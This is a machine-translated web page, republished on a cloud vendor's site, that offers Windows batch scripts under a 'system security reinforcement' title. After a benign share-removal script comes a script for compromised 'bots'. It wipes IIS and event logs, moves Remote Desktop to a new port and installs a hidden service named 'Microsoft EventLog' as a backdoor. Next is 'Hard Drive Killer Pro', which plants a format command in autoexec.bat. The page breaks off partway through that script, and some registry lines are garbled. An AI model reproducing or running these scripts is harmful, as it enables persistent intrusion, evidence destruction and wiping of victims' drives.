Reinforce system security with Batch Processing

Source: Internet
Author: User

Delete batch processing for win2k/xpsystem default share
------------------------ Cut here then save as. bat or. cmd file ---------------------------
@ Echo preparing to delete all the default shares. when ready pres any key.
@ Pause
@ Echo off

: Rem check parameters if null show usage.
If {% 1 }={} goto: Usage
: Rem code start.
Echo.
Echo ------------------------------------------------------
Echo.
Echo Now deleting all the default shares.
Echo.
Net share % 1 $/delete
Net share % 2 $/delete
Net share % 3 $/delete
Net share % 4 $/delete
Net share % 5 $/delete
Net share % 6 $/delete
Net share % 7 $/delete
Net share % 8 $/delete
Net share % 9 $/delete
Net stop Server
Net start Server
Echo.
Echo All the shares have been deleteed
Echo.
Echo ------------------------------------------------------
Echo.
Echo Now modify the registry to change the system default properties.
Echo.
Echo Now creating the registry file
Echo Windows Registry Editor Version 5.00> c: delshare. reg
Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]> c: delshare. reg
Echo "AutoShareWks" = dword: 00000000> c: delshare. reg
Echo "AutoShareServer" = dword: 00000000> c: delshare. reg
Echo Nowing using the registry file to chang the system default properties.
Regedit/s c: delshare. reg
Echo Deleting the temprotarily files.
Del c: delshare. reg
Goto: END
: Usage
Echo.
Echo ------------------------------------------------------
Echo.
Echo ☆a example for batch file ☆
Echo ☆[ Use batch file to change the sysytem share properties.] ☆
Echo.
Echo Author: Ex4rch
Echo Mail: Ex4rch@hotmail.com QQ: 1672602
Echo.
Echo Error: Not enough parameters
Echo.
Echo ☆please enter the share disk you wanna delete ☆
Echo.
Echo For instance, to delete the default shares:
Echo delshare c d e ipc admin print
Echo.
Echo If the disklable is not as C: D: E:, Please chang it youself.
Echo.
Echo example:
Echo If locak disklable are C: D: E: X: Y: Z:, you shoshould chang the command:
Echo delshare c d e x y z ipc admin print
Echo.
Echo *** you can delete nine shares once in a useing ***
Echo.
Echo ------------------------------------------------------
Goto: EOF
: END
Echo.
Echo ------------------------------------------------------
Echo.
Echo OK, delshare. bat has deleted all the share you assigned.
Echo. Any questions, feel free to mail to Ex4rch@hotmail.com.
Echo
Echo.
Echo ------------------------------------------------------
Echo.
: EOF
Echo end of the batch file
------------------------ Cut here then save as. bat or. cmd file ---------------------------

2. Comprehensively reinforce the batch processing files of the system (patching bots)
------------------------ Cut here then save as. bat or. cmd file ---------------------------
@ Echo Windows Registry Editor Version 5.00> patch. dll
@ Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters]> patch. dll
@ Echo "AutoShareServer" = dword: 00000000> patch. dll
@ Echo "autoscaling wks" = dword: 00000000> patch. dll
@ REM [prohibit sharing]
@ Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]> patch. dll
@ Echo "restrictanonymous" = dword: 00000001> patch. dll
@ REM [prohibit Anonymous Logon]
@ Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesNetBTParameters]> patch. dll
@ Echo "SMBDeviceEnabled" = dword: 00000000> patch. dll
@ REM [prohibit file access and print sharing]
@ Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices @ REMoteRegistry]> patch. dll
@ Echo "Start" = dword: 00000004> patch. dll
@ Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule]> patch. dll
@ Echo "Start" = dword: 00000004> patch. dll
@ Echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]> patch. dll
@ Echo "ShutdownWithoutLogon" = "0"> patch. dll
@ REM [disable shutdown before logon]
@ Echo "DontDisplayLastUserName" = "1"> patch. dll
@ REM [do not display the name of the previous logon user]
@ Regedit/s patch. dll
------------------------ Cut here then save as. bat or. cmd file ---------------------------
The following command is to clear all bot logs, disable some dangerous services, and modify the terminnal service of the BOT to stay behind.
@ Regedit/s patch. dll
@ Net stop w3svc
@ Net stop event log
@ Del c: winntsystem32logfilesw3svc1 *. */f/q
@ Del c: winntsystem32logfilesw3svc2 *. */f/q
@ Del c: winntsystem32config *. event/f/q
@ Del c: winntsystem32dtclog *. */f/q
@ Del c: winnt *. txt/f/q
@ Del c: winnt *. log/f/q
@ Net start w3svc
@ Net start event log
@ Rem [delete a log]

@ Net stop lanmanserver/y
@ Net stop Schedule/y
@ Net stop RemoteRegistry/y
@ Del patch. dll
@ Echo The server has been patched, Have fun.
@ Del patch. bat
@ REM [disable some dangerous services.]
@ Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp]> patch. dll
@ Echo "PortNumber" = dword: 00002010> patch. dll
@ Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsdpwdTdscp> patch. dll
@ Echo "PortNumber" = dword: 00002012> patch. dll
@ Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]> patch. dll
@ Echo "Start" = dword: 00000002> patch. dll
@ Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService]> patch. dll
@ Echo "Start" = dword: 00000002> patch. dll
@ Echo "ErrorControl" = dword: 00000001> patch. dll
@ Echo "ImagePath" = hex (2): 25, 00, 53,00, 79,00, 73,00, 6d, 00, 6f, 00, 6f, 00,> patch. dll
@ Echo, 00, 5c,> patch. dll
@ Echo, 65, 00, 6e, 00, 6c, 00, 6f, 00, 2e, 78, 00, 00> patch. dll
@ Echo "ObjectName" = "LocalSystem"> patch. dll
@ Echo "Type" = dword: 00000010> patch. dll
@ Echo "Description" = "Keep record of the program and windows message. "> Patch. dll
@ Echo "DisplayName" = "Microsoft EventLog"> patch. dll
@ Echo [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesermservice]> patch. dll
@ Echo "Start" = dword: 00000004> patch. dll
@ Copy c: winntsystem32ermsrv.exe c: winntsystem32eventlog.exe
@ REM [modify the 3389 connection, port 8210 (hexadecimal 00002012), name it Microsoft EventLog, and leave a back path]
3. Hard Drive Killer Pro Version 4.0 (it is really not easy to play batch processing to this level .)
------------------------ Cut here then save as. bat or. cmd file ---------------------------
@ Echo off
Rem This program is dedecated to a very special person that does not want to be named.
: Start
Cls
Echo please wait while program loads...
Call attrib-r-h c: autoexec. bat> nul
Echo @ echo off> c: autoexec. bat
Echo call format c:/q/u/autoSample> nul> c: autoexec. bat
Call attrib + r + h c: autoexec. bat> nul
Rem Drive checking and assigning the valid drives to the drive variable.
Set drive =
Set alldrive = c d e f g h I j k l m n o p q r s t u v w x y z
Rem code insertion for Drive Checking takes place here.
Rem drivechk. bat is the file name under the root directory.
Rem As far as the drive detection and drive variable settings, dont worry about how it
Rem works, its d * amn to complicated for the average or even the expert batch programmer.
Rem waiting t for Tom Lavedas.
Echo @ echo off> drivechk. bat
Echo @ prompt % comspec %/f/c vol % 1: $ B find "Vol"> nul> {t}. bat
% Comspec %/e: 2048/c {t}. bat> drivechk. bat
Del {t}. bat
Echo if errorlevel 1 goto e

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.